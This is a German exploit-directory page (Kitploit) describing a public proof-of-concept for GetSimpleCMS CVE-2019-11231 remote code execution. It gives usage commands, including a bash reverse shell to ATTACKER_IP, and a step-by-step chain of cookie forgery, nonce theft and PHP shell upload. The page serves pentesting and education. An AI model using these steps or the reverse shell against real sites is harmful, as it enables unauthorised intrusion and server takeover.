Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-11231-PoC — CVE-2019-11231 PoC | Kitploit
Tools/GitHubGitHub/akincibor/cve-2019-11231-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubakincibor/cve-2019-11231-poc

CVE-2019-11231-PoC

CVE-2019-11231 PoC

Repository anzeigen
1vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

GetSimpleCMS CVE-2019-11231 RCE Exploit

Python CVE

Unauthenticated Remote Code Execution Exploit für GetSimpleCMS ≤ 3.3.15

Sicherheitslücke

GetSimpleCMS macht vertrauliche Dateien öffentlich zugänglich (/data/other/authorization.xml, /data/users/), sodass Angreifer:

  1. API-Schlüssel und Benutzernamen auslesen
  2. Authentifizierungs-Cookies fälschen
  3. CSRF-Token erlangen
  4. Beliebigen PHP-Code hochladen und ausführen

CVSS-Wert: 9.8 (Kritisch)

Verwendung

root@kitploit:~
pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

Funktionsweise

  1. Version ermitteln → GET /admin/
  2. Salt auslesen → GET /data/other/authorization.xml
  3. Benutzernamen ermitteln → GET /data/users/
  4. Cookie fälschen → SHA1(username + salt)
  5. Nonce abrufen → GET /admin/theme-edit.php
  6. Shell hochladen → POST /admin/theme-edit.php
  7. Befehle ausführen → GET /theme/shell.php?cmd=...

Dateien

  • exploit.py - Haupt-Exploit-Skript
  • requirements.txt - Abhängigkeiten (requests, beautifulsoup4)

Haftungsausschluss

⚠️ Nur zu Bildungszwecken. Testen Sie nur Systeme, die Ihnen gehören oder für die Sie eine Testberechtigung haben.

Referenzen

  • https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11231
Tool herunterladen